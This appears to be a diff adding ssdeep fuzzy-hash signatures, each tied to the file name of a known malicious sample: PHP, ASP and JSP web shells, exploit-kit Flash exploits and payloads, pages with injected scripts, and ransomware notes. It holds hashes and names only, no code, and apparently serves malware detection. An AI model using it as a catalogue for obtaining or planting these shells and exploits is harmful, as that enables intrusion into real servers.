+192:2cQkqQdtSapF9lGZdtSabxXc0XjsdtSRTlTcgXb6XdtoQTTeK4TwqOSvep:2KzE6bXdqM/Si,"PHVayv.php"
+192:2cQkqmhqOAEUvzDZB+EVkgQKX5qyK2Ewwe3fpDiUEXtdY6NC6GRuRd0iGsjx3Mg4:2uqOAfDfLB5qy53fpeTt2YzBRd0ibZ/M,"Sim-Attacker.php"
+192:2cQkqCN8lqlNtfe7XyoS7ywKtiNowxJ+dhJznCQDJDdoa2Jc6B:2gpuTS7WnOnuc,"backdoor1fr.php"
+192:2B+irhMoJFnRRP/mXwkL7ZxkD35MEZrfOY7+H5DdZ81:o+AHF7P1kxs5npj7YQ,"bt.php.133"
+192:+29YZC5gCXDCoINUlITYyFzmyJsZ9smCgeY3LtLMYkSYcihs:+29RgC2oGJNmcsZuJgn7twNX3hs,"original.accountTu39.phps.001.001"
+192:23ivvwb3szNj300spHQ3C+VE3QVPHEPE3QUduaRE3Q8E3Q9odMUeudSm5Bvoyo6x:23ivvwb3oNT00spHd3+h3s3u3Eq9j,"bt.php.229"
+192:21dGlnCKV6k/4ces7IKDc7HBwKlOiyDd96f4TlIgcA:8GUKg84ct7PqBPlryDd96f4B,"bt.php.58"
+192:1yM4XJUaqQoNI/QS8QYZQgKQCxcNssngFdzdLO9GqKRJ/O7lWwfQ9vB/egtVt81h:oj2QoNI/QS8QYZQgKQCJqKRs5YB36,"shell.txt.1"
+192:1VqBmvFjcpBHYFXYfSpaxX8dd69i/BixAKTNPhbpd5:1VcX49Yf/E4qixAsBT5,"kral2.txt"
+192:1PqBv+xCbmk5uKwPHN5PN5iN50DFuatN5be1R0eVri+u4XOdS9Fannw7Min:85+xCbmYk5V5450DD5S1LVriN4UZnwtn,"bt.php.75"
+192:1KN9EmoCk1Q36kzB6n5OkHq0d5S+zC7PHlF5SR43/fnrRYjVGl4+84P9AP2DHrUh:17uKcI5OWqqU3SR86Ul/PvbYN7,"2016-07-07-page-from-drupatis.com-with-injected-script.txt"
+192:1JStP8ylzcaelb9pSt+iNpS9lUStPrPkS4gh8JEI0XFStPnczca9ZAbRF5bQStPB:1JvBaW4ghC0XFKFxQdOW3LBM,"klasvayv.asp"
+192:1HjKL8Yqc7KQ81AppUO4L1pc4BpwHppQpNppUY4e9p0pwHVpQpa1yRb91ddqIbpU:h,"2016-07-14-Afraidgate-Locky-decrypt-instructions.bmp"
+192:1gIT3rtv9v9U+eJQG2edua75Q1zQG3AaETjdSRblnx7RHlCdGm:1Ntv9vepFQhR3A7t6Jxd2,"bt.php.222"
+192:1dSF/hUHm9GPmdfgweCiWHAHBH9WHHmuaXMk:nsF9nghcI,"bt.php.170"
+192:1cUBmHyvW9gIO8nXXcKuaPe7j+rdS5Ldx9bME:1UHEIFceemW,"bt.php.101"
+192:0zsjFoTpkykJPgOxJoD6vMVeuo4y697RMWl3rRe/S+9tvqqSMw6ea7icGFJU4JJJ:0zT6vieuogbR+rqqSnO7wwTurz9n/Jpd,"2013110125222650.aspx"
+192:0Sn4J95oeIDo7d29k3r4tvp7s3Eh4YM73byl:Xnve4oh29kKuYn,"bt.php.196"
+192:0RcNMYINYk+0hcK7N18agWNJx18H1b/+ok11cN3NL9Rc1zlJVfjZI+0mu+0TQ+0j:u2eZ2RyHEZohZbKYK2Z1j,"default.php"
+192:0pap2hZGMxDrWupKqc56ES2e/rUV02zDyCMLY2f:Sa6ezNM02f,"594716f73fbbf2291c2a3627f2857519_php.txt"
+192:0nsZR7JcEWWEXMuVtPcvkN8ggLvwCjJ5zC/wCTkqqZFGWDlIa5Zw6F/8N:EsZR8pXMuWkNU2dQKWD2abhuN,"weak2.php"
+192:0nsZR7JcEWWEXMuVtPcvkN8ggLvwCjJ5zC/wCTkqqZFGWDlIa5Zw6F/8A:EsZR8pXMuWkNU2dQKWD2abhuA,"wpes-v0.2.php"
+192:0NJxVArtJdK4eKvsOikblULpnhmKKmbyzg8KNoe6:sJxIKqsOzbUpkQbyzg8qs,"bt.php.76"
+192:0naoN+adQ3kvQ8ekQqXKXwei/ReqmvTbu/ZpfSN2QMIK10cqtRfS:KvDektePiZeXrbuBQ2QMIKCHtpS,"RemExp.txt?"
+192:0lqwzEEPnjBmustDBzWj3L5G3R18tIl7Fr+vJd/sGm:DwwEBmuKDk3L5G3EsF6ve,"bt.php.211"
+192:0jvj1lgTKjUdPaYLXoVQXOs+njvj1lg3jhN0cYq1q6byM9hgqAasNMGMZHhdgX6L:+EFaeYVls+nwQg9hTsmG+1,"sosyete.txt"
+192:0H+BAsftEWB/sRTVM8rQ4+DCCX6A8AjtDdEE4PxEvSFw5:2+BrFBERpxrQ4+DTX6GZDdE1P6vB,"bt.php.193"
+192:0H9J30dZ7I2YyJiQPupPuQUPuEnuua+PuLq5dSRL2oYryMI:EwA4+NLsq,"bt.php.138"
+192:0fCuXB0pUZALZWUgrOLLhDT2hYJlv9zG1zT5kRCiZiuh9An+o:0fVXB0p2AWBaLhTyYJlvtG1zT5kMOiuO,"Php_Backdoor.txt?.001"
+192:0f9TKiBOCVK621sOZMAZgaPdB0YSebSvq:0f1KiccfQpNSvq,"STNC WebShell v0.8.php"
+192:0dSZpe3T/1oBsUnnbr5DEVP6ZFcuao1/P4cDMg:2V6BDbr5D66ZFJ1XRd,"bt.php.11"
+192:+0BqX3hv3tQTBomV/8Go41qDyDlUz0ATU45L8GEy8muWlnatT:RQX3hvtQTBoqPo4YDyDlUbLLuunC,"preg2.php"
+1536:zZSJHCoG+zmwY/zoGxGq3tc0W2+QdM0N9O8888888888888vE888888888888LLc:dSC1+zmLlxdtF+CM04beUcOjFP2,"EgY_SpIdEr ShElL V2.php2.jpg"
+1536:zWHawEFCGR34++TqoiLsRCOJn51cCWLSTm8+EWerjXWx6tUMp9RLpzyujfYe:zWySn51GSTm8nJN,"r57iFX.php"
+1536:z/UvyFa9PmJfJ+Y9pguCTD2oGdOZUQlAb1FgsT4MlEA6dRJc4NIiOi3Lqnl6+zdA:zbsGfUY9iD2oGTQlA5fEA6y4+LKqnIEI,"import.php"
+1536:zsNXIlidhzaWRNe2dzaWRNedONnfcGmQ6bkWsE0pc+J:zqY8dMkWsrJ,"1.jsp"
+1536:ZSiYQwlXtQKMvJlOTIFcpGCROaCRHA7WxGb:ZFOTIcpfR4HVo,"WSO.v2.1.php.txt"
+1536:zS4bNDn+XW7tpMwKHIpmOZz50Mc+TOS46XwP+k:zRndjKHIpPz50MVOUrk,"95e7e52210f931e4830d7a534cfc347a_php.txt"
+1536:Zr7PTDZ8Yb3GXJGv7yc2Eh2wkHIAxl8wjvPOVIPxPrLieoUCDF3zpefegaud4PGG:dTd8ZXu7Bh2wkoAxlnWVI5jLLo9Z9DI4,"DarkBlade1.5.asp"
+1536:zqNXIlidhzaWRNe2dzaWRNedONnfcGmQ6bkWsE0pc+h:zsY8dMkWsrh,"1.jsp"
+1536:zpFJjpBg/aLn962665KHq45bNse5RdhhGO:zp7pBTs2665KHq45b2e5RdhhGO,"588a682ce1f5145a8cf2df58f81ffc9b_php.txt.001"
+1536:zoN9Ig1N8K3fvRWm7cQLjjMirWJE+YQbB6rOTyMz/Hn:FK3nRFcQ7TCJE+YDKTTzPn,"2016-06-20-Rig-EK-payload-after-monavocatparis.fr.exe"
+1536:zNvc/7O1o0F1NN6AWodP/ypvjlk725CwiVdCVNl5+nkzB0lqaZnN9G4/h:zNvc/vANN6AWodP/qvN5CZCMqy9G4J,"Metalsoft_by_Metalsoft.v1.1.php.txt"
+1536:ZLizJdPD91Q2iit2a+lB1P62u4oe0cRdUkBm2scwvTGVGZx2Y:Z27yeKL1P634/VUkBr2aMrJ,"2016-07-25-Magnitude-EK-flash-exploit.swf"
+1536:ZkNlDN8h+gd3gkan15FF4+bHDcmGfG1jgEGC1VwMZfd3mLDRVV9zPva6jRgLEg:Zkjb5PbHDcgZV3mPnjtgQg,"2016-03-28-pseudo-Darkleech-Angler-EK-flash-exploit-after-jacobwirth.com.swf"
+1536:ZjC7dEFffOzP7cPT+QdFIGrrkiGZJIhhxWKBXR8:ZjC7dM4PYRTDrrLaUxWKhR8,"diam.txt.6"
+1536:ZjC7dEFffOpP7cPT+Qd/IGrrkiGZJIhhxWKBXR8:ZjC7dMcPYRFDrrLaUxWKhR8,"diam.txt.5"
+1536:ZjC7dEFffOpP7cPT+QdFIG/rkiGZJIhhxWKBXR8:ZjC7dMcPYRTD/rLaUxWKhR8,"diam.txt.8"
+1536:ZjC7dEFffOpP7cBT+QdFIGrrkiGZJIhhxWKBXR8:ZjC7dMcPsRTDrrLaUxWKhR8,"diam.txt.7"
+1536:zEtPrMq7g5+9cdfA9ss7bhplihXRPaUEVIHv93:wtD7g5+Xfk,"2016-05-25-page-from-ceisystems.it-with-injected-pseudoDarkleech-script-second-run.txt"
+1536:zBcNhTacF22Ld+5cTipeimmMpKTppzi1ReyQ4h+db491M4T3PDw:zH2LDKTppiRpCiPw,"WSO2.7 404 Error Web Shell.php"
+1536:z6TYxyHjwG11s8OsPtJgJb3tE4rMpgMWqpDyf0/ZuKavnKfGBrlugnSPTCvHtS:dxAF11s8OsPtabEZgHVhvZJugnSP5,"body.113.097"
+1536:Z6TYxYaww83dJS2BorIpwPNfAfvHZYFjCYzw6DycBgOaiu3gnSPTCvVtS:fx6rBKIpwB+vHZ/EY3gnSP7,"body.113.062"
+1536:Z6TYxyaqwnnBgKuvTqFNs369JZSpaGX8X75rl6gnSPTCv5tKy:fxe+ILqEaGelJ6gnSPby,"body.113.134"
+1536:Z6TYxYaqbxQWLev3ENyQ5+0QmKZbm/ZDDIuswqPPSu+gnSPTCvFtS:fxone/ENyQxKZEcb+gnSPv,"body.113.058"
+1536:z6TYxYaKH0mtrIv+ZUZDJX9/9i+zSZQIiN2yggWLEZe1uegnSPTCvnjtS:dxYUmWvcao+zSZ25egnSPg0,"body.113.054"
+1536:Z6TYxya4wO0UMalviyMHzd6BqSBrlXgnSPTCvltKy:fx8l3MFwJXgnSP/y,"body.113.119"
+1536:Z6TYxXEvwEbeTXVao7toYZVTMloAqtLaLuD5KMktaFB5H6blTMnK8qASVgnyPTCR:fxCgVD7qY/MCAqtLay5KMbFtaVgnyPjy,"body.113.270"
+1536:z6TYxXEp88TUp02MI60agWVH7JXUU5na3AnQ1vjp1F8gnyPTCv/tKy:dxML0Mr0aZVVECa8gnyPVy,"body.113.282"
+1536:Z6TYxXEkwPQuTVpy9Asg2hThXKH+2KUZjeqNPW1mRBAF+gnyPTCvNtKy:fxtITV12vXKHKx+gnyPvy,"body.113.255"
+1536:z6TYxXEhwyoidzguLotPry6hf5l/2tfvDinHVtC2R/JFGgnyPTCvztKy:dxI3SuLw7/cA7DGgnyPhy,"body.121.002"
+1536:z6TYxXEA8852gbulnjmemDvg5v1qQCKYH0wUIaTcimvjDgnyPTCvjtKy:dxvL52gYmembg/qGYB7DgnyPVy,"body.113.289"
+1536:z6TYxsE/WwLr2xVdpByImjW7c5eeTzrD5ZUD8F3pDKz7e65rlRgnSPTCv/tKy:dxXWZxGIJ72TtCnzJRgnSPFy,"body.113.214"
+1536:Z6TYxsE7wTP4Lu5btX8o8QA1urefrRazExd3OQm7OrlWgnSPTCvdtKy:fxzuP4LMtXDfA1uHcJWgnSPfy,"body.113.191"
+1536:Z6EytdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:Z7,"good.php.28"
+1536:Z4ax2YGNkO4sH9KtwlukVt9JW17g2/bnoDSSRJ4UJMdSaNykBznyUdB1JyCfeY:bx2YGNkVtX73noDS6iSa3feY,"r57_by_Albania.v3.5.php.txt"
+1536:YYZzFKOkuqp1VagQNOVzocysIyAiQOlHKbnFMBMK6IK8eMp:RTkuqpLvOOVzocysXhAOtfB,"aspx.php"
+1536:YYZzFKOkuqp1VagQNOVzocys7yAiQOlHKbnFMBMK6IK8eMU:RTkuqpLvOOVzocysWhAOtfM,"aspx.txt"
+1536:YysOGbOHCfBVDnRo8ST5jSBfA0hbQdZBW2b0T/pNll:Y1JDdRO+QVWS03P,"h6oAwT3VAi6S"
+1536:yXgZaXRuX6xyFwT1PjqUnNn/V2CNT/IN+zJ94DA5A5A5EvqM:rZaXRKLwT1bqUnNnt2CNzIN+SSe,"PHPRemoteView2.jpg"
+1536:YU1+C8LZOaJnav1i0g7Q9lLCpnwwIgq9y5UdCT3Y6739aM+e4c7e0fIVqz2CHdPm:nUVOaJnagklLCpnwwIgq9y5UdCT3Y67c,"c99madshell-v3.0-BLOG-edition-smowu.php"
+1536:ysNXIlidyzaWRNe2dzaWRNedOnn9cum26bkWsEKpcXj:yq5WPMkWsAj,"u.jsp"
+1536:YrNh5/HVlFyTcBoWgDbGMJ5OxxfdEWOSM4pcvxta2IiFJXuUfXoJE1LrGg/Bjye:aNh5/1lFyTcBoWmbGMAxFEpSM4pcvxtX,"ASP.NET-W32-Shell.view.aspx"
+1536:yQYbx25nmqtZD8hYtBJ7iceO4GuTvTvic4YSCPrWjmyh0ws5:HO25nmqHD8hCKRKRxCyHh07,"80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp.txt"
+1536:ypO2ZVCj0OrQabkLA9iRiO0Qm508AZq4fTHVaLxX5u+ij4WCo2Tn/7EBJMBlDWbi:GO2vKV9ikQmLuq4mJ5uOTn/QBJMej1Xo,"r57shell.jpg"
+1536:YO5bcJN4rrUoXOSMBGWt91p9cmeqEqPfKG:TF4SSGWt91p9cHqEu1,"2016-03-17-other-Angler-EK-flash-exploit-after-localtasteblog.com.swf"
+1536:Ymvkgo5TgPtBbXXTjg5RDDwwPVD3QBTj8HRCml9Za+BDMFZc:8gohgPtZXXTjg5RDzVDYkRA+BDMFa,"cyberlords_sql.php.php.txt"
+1536:y+MApMPndrxrPKLJuzADl2swe4OH6VgZAShsNoZFh1:gApMPnV+EzADlTw66mSShsEb1,"c99_PSych0.jpg"
+1536:ykgMg2LkEcpZqliEFfXOaPR4eMLJRFRamRHe5gZ6Rg7HhUyS6fOwoKZbUSYGeebE:PLgsT+6RSgSYGL45aTq,"zend.jsp"
+1536:YisoLd+zaNZJ8W4ClTlBRua9fEFS21Hmh/win0:YivL2aXJBJTBua9fmlmIs,"CAR014 151239.doc"
+1536:yh7RJaHokEzVvL6qMjVfpVR3lSnPQmMxOSK:yh7RJaHok81+jVfpL3XmMRK,"webadmin.txt"
+1536:yh7RJaHokEWVvL6qMjVfpVR3lSnPQmlxOSN:yh7RJaHokF1+jVfpL3XmlRN,"webadmin.txt.001.001"
+1536:YH57uY+5nQOsNZggKgBK6er+CmmfLsoKgXQvpUn7Wlnr4uaSrypH/jyosphCzBVu:Y1+hpeZnKKerDvTXKgXQvpcpuayywhgU,"2015-08-13-Angler-EK-landing-page.txt"
+1536:YGsVvgeQ3w1Y4VUKtMOlBxRf4SILsLra46iPkebWSPMWkmpXHjfFndIx1Bau/I4j:rsye8w1/2aBDf4fLya49M2WS0WhTfEBf,"2016-07-20-pseudoDarkleech-Neutrino-EK-flash-exploit.swf"
+1536:YFEPJdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:Y7,"good.php.34"
+1536:ycrlocLbZD06+W3UvQe+1OMwWjnBlGhIVdk5y0X6FmYOObSOTOXSW8g:NvPV0foTRljnDGhkaY0A9TOXSWX,"2016-07-28-pseudoDarkleech-Neutrino-EK-flash-exploit-second-run.swf"
+1536:YC7bNk5S12J+vrCwtpM9KiztMzp6dLpRLk4TsHH4QRzwPzY:YCW5m2KiztMzpwROJ+Y,"index_backup.php"
+1536:+YAjd8Yhqwcp6kdV9BHJOquFSzCGgFGJlac7TPeGWI:+YquSG6m1Oq7CGZvp7rsI,"b374k-2.7.source.rar.001.001.001"
+1536:y987ni/Sw2FdeD13aNzd6eFcHROL5PGPDRKHPgFTCL3MHmRLfjy1THorB9PdTGMc:y9aKShBNF9PPbTQ,"2017-02-28-page-from-zonadjsperu.com-with-injected-EITest-script.txt"
+1536:y6TYxyaowJvCAukak5sNJi+nkSyfBn2iWGyWkTy0gZ8jBrlugnSPTCvatKy:ExUWv0kak5sNhnkScn2iSJugnSPAy,"body.113.128"
+1536:y6TYxyajwyEzfql9VpegezEdxAXIrQrLAeQYOkLwq8XPf26i022b49Brl8gnSPTn:ExH8fqlNehEMXS6LAeQ2wNyDJ8gnSPsy,"body.113.116"
+1536:Y6TYxXExClwPkhkRY5QBojTsdxSDC25jnp4ZupO5l4vgnyPTCvwtKy:mx8ClwR6jwdxSGbMvgnyPyy,"body.113.265"
+1536:Y6TYxXED88bOxOLsFHZf/ro9STLGltgmOMs0ZPRSDmg+mXAargnyPTCvEtKy:mxCLb4AsFHZfnGPgdMLWrgnyPWy,"body.113.291"
+1536:y6TYxXEa88S7CYgBPC8UPLNfWN+RJyBBMONkK5eKzhZmwDK5QFsL3gnyPTCvWtKy:Ex7LS7CLCP/RJyBBMON3xFsL3gnyPsy,"body.113.338"
+1536:Y6TYxXE6YwXS/lfJA9mlOgjeTY3KuARdng7mdNkOnUSOuJgjGFwgnyPTCvQtKy:mxfYhAIOw34RdngYnwgnyPWy,"body.130.001"
+1536:y6TYxsEDwmBuixH1NmtkizfBUbvKYE4Grt0pMY95rl3gnSPTCvStKy:ExLuaNmtkYibZLJ3gnSPcy,"body.113.219"
+1536:Y4VwHdWFvX9tduff/xmLF0L9+zeDItDrk85cU7XGVumXbEIH:Y4YdWFv0H/YkPyTcUTGVfrB,"P.A.S.v.4.1.1b.php"
+1536:XXTo0pOORqBRDPlKie/juPVH08KxgSgTn++:XDbOOUBvi/SPVH0VxGTn+,"2016-08-11-EITest-Neutrino-EK-payload-CrypMIC.dll"
+1536:xVod9vI7DMhVqRRRUa6Z/LCIOa+Mfy9fyMAht15BxqAIvLSYvcB+uK5r4wBxJiqp:oXgHRRRUJZTCVfyMAhj5BiD4M4ynbWu,"2016-04-19-TeslaCrypt-decrypt-instructions.png"
+1536:Xv5l3pMtzVrdtNX7VU7qrXwML0B6CVH/TOjGg69B8H:Xv556/sCKjVH7OjGg6YH,"2016-06-01-page-from-oilsofjoy.us-with-injected-pseudoDarkleech-script.txt"
+1536:xu8f4bQ9eRFDP+6jNbWKY75dVeI9Owklv92AFjHD17lGZ9T/xrUMQXqUI:xvOnjNby7bV2wk192AFjHDPGbOMQE,"2016-07-19-Afraidgate-Neutrino-EK-flash-exploit.swf"
+1536:xPNgxtnxZGwXrKcRG54I+n8q7WsaFlfD9N5RiEzYOvypBXsarGlFKc4n7u1qQ28h:xPNgvA,"timthumbs.txt"
+1536:X/OreJOAxvnxp7UKDrStMJjhY8YFlBrCQpdyR8BKgC9hXhx1kAQ2duGMq0ck1Epf:X/OreJOsnxpAKMaWrxaRzr3Ra3B0,"I-47.php"
+1536:XNUch7O1o0x1NN6AWodP/ypXjYIvh5uwiVdCVCu+vwXzdv5LXAM9x4t6:XNUchv0NN6AWodP/qXL5urCX/9x48,"b374k-2.2.php"
+1536:XNM8kcLGdNFypcFzlVSiMGsT4BGXzekn6pyhrTNPQD37n1mBG0u:X2xNFypcFfNSTkGjtn6MhxgzQu,"星外虚拟机提权专用asp大马 (1).asp"
+1536:XNM8kcLGdNFypcFzlVSiMGsT4BGXzekn6pyhMTNPQD37n1mBG0u:X2xNFypcFfNSTkGjtn6MhOgzQu,"星外虚拟机提权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp"
+1536:XNM8kcLGdNFypcFzlVSiMGsT4BGXzekn6pyhMTNPQD37n1mBG08:X2xNFypcFfNSTkGjtn6MhOgzQ8,"星外虚拟机提权专用asp大马.asp"
+1536:xN0ECHaMzewNIyOBPvEFKo5kC0D8p5aGVrLibfpwreG6jQuaHyt:xN0ECHaMzt0D8pTWbf6rUQu4C,"PHPJackal.txt"
+1536:xN0ECHaMzewNIyOBPvEFKo5kC0D8p5aGVrLibfpwreG6jQuaHye:xN0ECHaMzt0D8pTWbf6rUQu45,"PHPJackal.txt.001"
+1536:xIDPEqVoQzjreP/cyaRUKmGmleJVN9qyqPrCNSExDcmCj0h+nLrITL+pQQrnVW+E:2DPEqVFreP/cyaRUKmGmleJVN9qyyuNT,"银河舰队大马_2014版.asp"
+1536:XGesGOawl/Z822JtuZHE8OoHR3JCzTCnNljUK:X3hD4Z82PE9Q3+sR,"b374k-2.6.php"
+1536:xG6xQhnq0xZ7lYgSoMU/Uydu12D3MMuqQsUg4BQhynJdEDmTm+d2Awz87Ah:sGx0bJS1UMydu12DBjjhhmJd+Galh,"2016-06-30-EITest-Neutrino-EK-flash-exploit-after-4county.org.swf"
+1536:xG6xQhnq0xZ7lYgSoMU/Uydu12D3cMuqQsUgrk/4QxthynJdEDmTm6d2AwzcH:sGx0bJS1UMydu12DxjjnEthmJd+CacH,"2016-06-30-EITest-Neutrino-EK-flash-exploit-after-cliniqueh.dk.swf"
+1536:xfgOree+k4LlGjO9YXBojz3Zy+FBb4MbygQEj+VrLc26:BJreXTkqie/ZyWBb4Mb3j+K,"r57.v1.4.2.php.txt"
+1536:+X+bNl5R1DdvrvTtpMBKiztMGpqTwhRd3+n4WbBwPzi:+c5hQKiztMGpbRUvgi,"VirusShare_fe77a3004b222d50eccd7c7caac83ca6"
+1536:XALWsgyNK+VheGpulB/UE7RiGXOhrnPsPa4xVF1a:tiK+zrgT/UE8GerPs3Da,"dlc.zip"
+1536:x99mcsmkfBWa1l32vl9lbi4Km/G8nowx1kaedP5jQJ3p2:1mcsmkfnJ299lbi4nowxGags3o,"2011.php"
+1536:X6TYxYoDqGTHNFaBOAIWBqgruoHK7k2oYdLKgOPTCv7tS:xxoGTHuBOAI2DhgQgOPJ,"body.113.036"
+1536:X6TYxyagwglFDNtE2nz4l3C2wnxbubWxbKFLTmMVcI3ju3FOrldgnSPTCvDtS:xxUFlFDNtEe47W8x3qkJdgnSPV,"body.113.072"
+1536:X6TYxyacwaV7xYnY65O5StKYnYm+e+TwCMi9+nUYF2xhmCkQEDNh8WtU0BrlIsgq:xxoD7aY6ISYmdMwCuUfMxJLgnSPB,"body.113.080"
+1536:X6TYxXEN88ruCQ5G7enBoOkWOHIKIiHiJGn0thYbfAceiJmZVQcBfralSwgnyPTw:xxmLruCwknHEJGn0thYLUt+lSwgnyP1y,"body.113.328"
+1536:x6TYxXEmw5m8nmheFxKZ+p/We7cKsyfYOHG64EjaugnyPTCvdtKy:nxPT+p/WePNWugnyP/y,"body.113.278"
+1536:x6TYxXEg888M2B4usn+HFv64m5ySgWVHxSaIXbxgIeCZDStJUJFOgnyPTCvZtKy:nxZLsHFv64m5vZVRSbru0bOgnyPby,"body.113.283"
+1536:X6TYxXEbuwhYXgUPL7q786dpsUuf6BLRHaW0aPJ5yVj/gnSPTCvLtKy:xxKuR7q7Lsz5daS/gnSPhy,"body.113.242"
+1536:X6TYxXE5d88YryUatiaraAl/iAe5BUFcJ7UoJj8iG/yllOzln/FvgnyPTCvLtKy:xxAdLYrjarauiAe5BSMoqoqavgnyPZy,"body.113.312"
+1536:X6TYxsEowe+0QobRBzKBtZxeaAK8LfJrxhKQxY3sjOrlOgnSPTCvLtKy:xxA/WobHzIxeaAK8LAJOgnSPxy,"body.113.166"
+1536:x6TYxsElwTm9VtV+gO9IKfCOsRH9UeTvU0N+IDf5rlfgnSPTCvBtKy:nxt4mlVgCFH1FJfgnSPvy,"body.113.197"
+1536:X6TYxsEKwObZV5PbXB5uTNjDkiYWXrcgHPMyKSSgnSPTCv7tKy:xxSlPt5iNjDxlSgnSP9y,"body.113.237"
+1536:X6TYxsE1wWvFfWi+82o38GDcNsBJUqVDEGBidrXwH/9FS4gnSPTCvTtKy:xxtFfJ38GDcNsBaqpqH4gnSPVy,"body.113.239"
+1536:x0StOeC/mgLyJM/oZa2XVQmDlIetO/bHuWfDGry4FFst+tEdQ4n:xmpyWpIQ0ttO/bHJfDGrlFstVdX,"2016-07-29-EITest-Neutrino-EK-flash-exploit-after-carolinagodiva.org.swf"
+1536:wYFT5xYJwaWS/0ftXuh7/q1EfbtV1pvwq+t:wYF1xYJFWSsF47y1EfbtV1pvU,"2016-03-09-page-from-www.rcp-vision.com-with-malicious-script.txt"
+1536:wxml0lMph8YvMjnNXZqrPUeTf4N64NchRH19Z9yjB9RSpIyogTooE:wxRA6YGXZePUeTgY4yHWrQZcoE,"sh.php.3"
+1536:wXJH+jmeXol3PT4DwCOgeiZHuGVvVAF3LEJ6n2:wF+/XF9,"crystal.php"
+1536:WuhsrQf9FgBEh5kjUiyqWY/z7IlRBESLbb7pwPV:/vgBEh5baV,"2016-05-24-EITest-Angler-EK-flash-exploit.swf"
+1536:WSQ4dMvbNDnszutbtpMwKcD5kscXHoXwP+eYp2eH:WOMtnOutTKcD5ksxbeYpV,"45bf9640843e95e049d3bdf584d20772_php.txt"
+1536:wS6TYxyaE48wCrGszAzBa4yDlcIP8bfry6UIJBrlLgnSPTCvuEtS:wkx448/GWyZyZPaJLgnSPpz,"body.113.085"
+1536:wPEzjhR5NPmlJmt08qRpPOxp2BBUtqISpTQI9xqgXC8Ju9G7jkLlWj6bo7Rt8/81:NfJ0L5jSlIHy1mvXpkEvg3IEJ4F+4L0M,"Backdoor.ASP.Ace.ab.asp"
+1536:wOh08GBkL0dQeIvegmLbHUAGhEHdBil6b4N/e2xiJS6:F4ByZ5mLblGhEH7ilG4N/riJh,"2016-06-21-Afraidgate-Neutrino-EK-flash-exploit.swf"
+1536:WNFzeA81o0Z1Su5I4AFAxmOqGgbhAC42/s4IInc7Hyw1lFPd:WNFzes8Su5I4AFAxPqGgbOCCTlFPd,"b374k-2.2.php"
+1536:WmPbMUXkjU9cDXwNeyFlVS7pLtaS5SAjZqGUqaxvEIa6xkYcmfxFyE0jpb2a9uwB:WWb7VAKfktRUA6k0pfTRVK,"2017-03-02-page-from-hurtmehard.net-with-injected-script-4th-run.txt"
+1536:WM3QFvOMwwOWpNB8IMjZQ/iDRZGQV+TqoimbCNRMIabYgdc51duRGVj+EPf57qHZ:WhFvOMwwqRi2HMIaldc51ERGVjv5kT/,"ly0kha-shell-1.31-dec.php"
+1536:WLppLgamvQNk7fc2pC1bvP45UsgZ0pfZjwESNxbBM8daWYHOXH58KK2Z93j+kjH:WLjUQSrc2CBP4qsfZUE0s8dakZIoL,"Win32.Infostealer.Dexter.zip"
+1536:wk99mcsmkfBWnRl32vl9lbi4Km/G8nowx1kaedP5jQG3pW:tmcsmkfIJ299lbi4nowxGagH3I,"angel大马-PhpSpy-2011.php"
+1536:Wk5YLuSI1g7B4/GEAtK2JJUDbM6FjEuZmdmxNhWXZG:Wk5YuSI1g7B4jABJJCb1xEu0mxPWXw,"2016-05-19-EITest-Angler-EK-landing-page.txt"
+1536:wjJMOcNkqSaBOR8yQ69mmMaKXPDVp2ynC4C6Mgm3Pf/t:wdMoRDf1KXPDVpXMl,"wso-4.2.4.php"
+1536:WgKQ3zeYES/SI2OPhkAtWW66aaaaaaaaaaaaaaaaaaaaaaahqqqqqqqqqqqqqqqL:/L3GSaGHb,"2017-03-02-Nebula-EK-payload-DiamondFox.exe"
+1536:wF00r/iT2Uu6dicyVj8B2B0FdGGI3MA7a3p3whhFYZkHaz8kmojO04JZuCasNcva:wF00r/iTDyVj8B2B0FdGGI3HW3xwhhFF,"MSSQL.asp"
+1536:wdEwBVLeF9y50ut4ZizUCc58lEBMgp7YsIckNzr2oju5nmT0C2ZZar74c3cDTW58:Oqut4H5F5oJr2V5DC2ZZwAnXlE+ESx,"Attack_Shell_Priv8_by_izleyici.php.txt"
+1536:W9LmzFoQmMJOxmt7KqukTi/Tn2ZwtGThlhopPKm6/MYowgmOHJ5N+/tKBsAX:/oQHJ6mt7Kqu+urowUTOpSm6awgmOHJh,"2016-06-28-pseudoDarkleech-Neutrino-EK-flash-exploit-after-airbornehydrography.com.swf"
+1536:W9EXdfdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:WGi,"good.php.6"
+1536:w6TYxyFqwyzs220qwZwQRmoCGZKoEHFYUJnlkTgmPzSNBt9H5rlFgnSPTCv8tKy:Ox/A2kwZwQRmoCGZKfFYUQmJFgnSPey,"body.113.143"
+1536:w6TYxyarwrhg/BDvJxIH3tZ7SmV9hY44Lfjmp6o04OOBrlBgnSPTCvAtKy:Ox3/vJx63tZ7dV9cCDJBgnSPiy,"body.113.113"
+1536:w6TYxXEz88hHDYlHotsutIaA0VgfAaPwpsT2UH566i3fBi/PmoaMuKngoSrPgnyN:OxMLhZVjaIpsT2UMhPB/cgprPgnyPiy,"body.113.317"
+1536:W6TYxXEy88CYy/3nIYj6gWV41y7g3WCZQu2TXazgnyPTCvatKy:oxbLc3nIYj6ZV41dzgnyPwy,"body.113.284"
+1536:W6TYxXEw88aOSaGJQrTUK2PKeFLQhXvv/h8O8kbQ4FlHZEazbegnyPTCvitKy:oxdLaOSa8FLQhXvv/bJzbegnyPEy,"body.113.368"
+1536:W6TYxXEq88ipXXSSULxCkYt3Qs91CEUvfH87qDCi3oMeZ/3uSIgnyPTCv2tKy:oxTLip9moQs91CHv9eT/HIgnyPky,"body.113.294"
+1536:W6TYxXElw11RpRtGJNfFMlLhacggWakH1vou47KnXU9YHS/gnyPTCvitKy:oxoUp6fcLhacLkHly/gnyPAy,"body.113.259"
+1536:W6TYxXEG88UNAvVYQBEFZXJUScrqvHXSAW/wJm8kUnF/MgnyPTCvGtKy:oxDLU6VplrqveM/MgnyP4y,"body.113.355"
+1536:w6TYxsEZwwppJv6R7MZ4T9Gzltxkv7wZeBoTB5rl4gnSPTCv0tKy:OxR76v9Gzl5J4gnSPay,"body.113.153"
+1536:W6TYxsEWwt474LLHL99Z90cSN6NVmR+cswSwiru0W5o4rssuUb00YFYYRli5rlAd:oxeqr6+Tru0W5o4rtcKJAgnSPky,"body.113.159"
